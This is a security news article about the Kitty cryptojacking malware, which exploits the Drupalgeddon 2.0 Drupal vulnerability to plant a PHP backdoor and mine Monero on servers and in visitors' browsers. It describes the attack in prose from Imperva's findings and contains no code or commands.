Cat got your tongue? It also might be stealing your computer processing power, in order to mine Monero coins.
According to researchers at Imperva, a newly uncovered, sophisticated cryptojacking malware nicknamed Kitty is attempting to infect web application servers by exploiting the recently discovered Drupalgeddon 2.0 remote code execution vulnerability that was patched last March. But what makes this malicious miner stand out among its brethren is that after compromising the server, it seeks to infect future users of the apps running on the server.
In a May 2 company blog post, Imperva researchers Nadav Avital, Matan Lion and Ron Masas explain that following a successful exploitation, Kitty’s first step is to use a webminerpool — an open-source mining software for browsers — to execute a bash script that writes a malicious PHP backdoor file named “kdrupal.php” to in the infected server disc. This helps establish persistence by installing a backdoor that does not rely on the Drupal exploit in order to remain effective.
Moreover, the malicious script is repeatedly downloaded from a remote host every minute, so that the compromised server can be re-infected or updated at any time.
Once persistence is established, the malware installs the final payload in the form of the miner program “kkworker,” better known as the XMRig Monero miner. It’s at this point where Kitty starts to behave especially, well, catty.
As an adorable extra flourish, the malware’s author has also included a message in the script code that reads: “me0w, don’t delete pls i am a harmless cute little kitty me0w.”
Imperva further reports that the Monero address used by Kitty was spotted in early April 2018, and is linked to attacks targeting web servers running the vBulletin 4.2.X content management system (CMS).
The Drupalgeddon 2.0 vulnerability (CVE-2018-7600) that makes Kitty’s initial infection possible is an RCE flaw that exists within multiple subsystems of unpatched versions of Drupal 6.x (obsolete), 7.x and 8.x.
“…It’s important to note that vulnerabilities that affect CMS frameworks — like Drupalgeddon 2.0– are particularly concerning because the systems make up a significant portion of the internet and are prime candidates for botnet herding,” said Rod Soto, director of security research at SOC services provider JASK, in emailed comments. “Botnets, as history has shown us, are a fundamental tactic used by bad actors for criminal activity and a main profit driver for the cybercrime underground – as they can be used for cryptomining, spam, identity theft, phishing, financial fraud, DDoS and more. So, even though the Kitty malware is simply lining bad actors’ pockets with cryptocoins at the moment, we should expect to see new variants of malware that exploit Drupalgeddon 2.0 to execute further attacks as well.”